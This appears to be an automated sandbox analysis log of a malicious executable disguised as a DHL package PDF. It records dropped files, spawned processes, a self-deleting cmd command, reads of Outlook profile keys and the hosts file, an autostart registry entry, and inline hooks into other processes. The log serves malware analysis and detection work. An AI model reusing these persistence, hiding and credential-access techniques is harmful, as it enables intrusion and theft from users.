          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A9
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeCode function: 0_2_00404686 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404686
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeCode function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,0_2_00402138
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeFile created: C:\Users\user\AppData\Roaming\forJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7032:120:WilError_01
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeFile created: C:\Users\user\AppData\Local\Temp\nsxD96B.tmpJump to behavior
          Source: DHL PACKAGE - PDF.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe SitulaCystocele,Hurley
          Source: DHL PACKAGE - PDF.exeVirustotal: Detection: 49%
          Source: DHL PACKAGE - PDF.exeReversingLabs: Detection: 33%
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeFile read: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\DHL PACKAGE - PDF.exe 'C:\Users\user\Desktop\DHL PACKAGE - PDF.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe SitulaCystocele,Hurley
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe SitulaCystocele,HurleyJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\SysWOW64\cmd.exe'Jump to behavior
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEFile written: C:\Users\user\AppData\Roaming\597OP970\597logri.iniJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: DHL PACKAGE - PDF.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000009.00000000.312329674.000000000DDE0000.00000002.00000001.sdmp
          Source: Binary string: f:\binaries.x86ret\bin\i386\bbt\opt\bin\i386\vsa7director.pdb source: Vsa7Director.dll.0.dr
          Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000004.00000002.346057255.000000000510F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000014.00000002.506606875.00000000038BF000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: NETSTAT.EXE, 00000014.00000002.504500510.000000000350D000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: cmd.exe, NETSTAT.EXE
          Source: Binary string: Microsoft.XslDebugProxy.pdb source: nsxD96C.tmp.0.dr
          Source: Binary string: PermCalc.pdb source: nsxD96C.tmp.0.dr
          Source: Binary string: ActiveSyncBootstrap.pdb source: ActiveSyncBootstrap.dll.0.dr
          Source: Binary string: cmd.pdb source: NETSTAT.EXE, 00000014.00000002.504500510.000000000350D000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000009.00000000.312329674.000000000DDE0000.00000002.00000001.sdmp
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_10006B78 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,2_2_10006B78
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_10002EED push ecx; ret 2_2_10002F00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_004178F7 pushfd ; iretd 4_2_004178FE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00414D4C pushad ; iretd 4_2_00414D4D
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0041CDE5 push eax; ret 4_2_0041CE38
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_004085A9 push esi; iretd 4_2_004085AD
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0041CE32 push eax; ret 4_2_0041CE38
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0041CE3B push eax; ret 4_2_0041CEA2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0041E6E0 push dword ptr [494A20F8h]; ret 4_2_0041E72B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0041CE9C push eax; ret 4_2_0041CEA2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0041DFF3 push es; ret 4_2_0041DFFC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00416FF8 pushfd ; ret 4_2_0041709A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_00416FA0 pushfd ; ret 4_2_0041709A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0506D0D1 push ecx; ret 4_2_0506D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_0381D0D1 push ecx; ret 20_2_0381D0E4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE78F7 pushfd ; iretd 20_2_00DE78FE
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DEDA51 push ss; retf 20_2_00DEDA5A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DECDE5 push eax; ret 20_2_00DECE38
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DD85A9 push esi; iretd 20_2_00DD85AD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE4D4C pushad ; iretd 20_2_00DE4D4D
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DEE6E0 push dword ptr [494A20F8h]; ret 20_2_00DEE72B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DECE9C push eax; ret 20_2_00DECEA2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DECE3B push eax; ret 20_2_00DECEA2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DECE32 push eax; ret 20_2_00DECE38
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE6FF8 pushfd ; ret 20_2_00DE709A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DE6FA0 pushfd ; ret 20_2_00DE709A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 20_2_00DED741 pushad ; iretd 20_2_00DED6F5
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeFile created: C:\Users\user\AppData\Local\Temp\SitulaCystocele.dllJump to dropped file
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeFile created: C:\Users\user\AppData\Local\Temp\mode\Thumbs.db\intern\ActiveSyncBootstrap.dllJump to dropped file
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeFile created: C:\Users\user\AppData\Local\Temp\mode\Thumbs.db\intern\MicrosoftVisualStudioUI.dllJump to dropped file
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeFile created: C:\Users\user\AppData\Local\Temp\mode\Thumbs.db\intern\PermCalc.exeJump to dropped file
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeFile created: C:\Users\user\AppData\Roaming\for\page_1\MicrosoftXslDebugProxy.exeJump to dropped file
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeFile created: C:\Users\user\AppData\Local\Temp\mode\Thumbs.db\intern\NatDbgDEUI.dllJump to dropped file
          Source: C:\Users\user\Desktop\DHL PACKAGE - PDF.exeFile created: C:\Users\user\AppData\Local\Temp\mode\Thumbs.db\intern\Vsa7Director.dllJump to dropped file

          Boot Survival:

          barindex
          Creates an undocumented autostart registry key Show sources
          Source: C:\Windows\SysWOW64\NETSTAT.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run 8PO04Jump to behavior

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x81 0x1E 0xE8
          Overwrites code with unconditional jumps - possibly settings hooks in foreign processShow sources
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7016 base: 774D5050 value: E9 EB 61 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7016 base: 774D50F0 value: E9 5B 61 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7016 base: 774D5180 value: E9 9B 60 FB FF Jump to behavior
          Source: C:\Windows\SysWOW64\rundll32.exeMemory written: PID: 7016 base: 774D5190 value: E9 CB 60 FB FF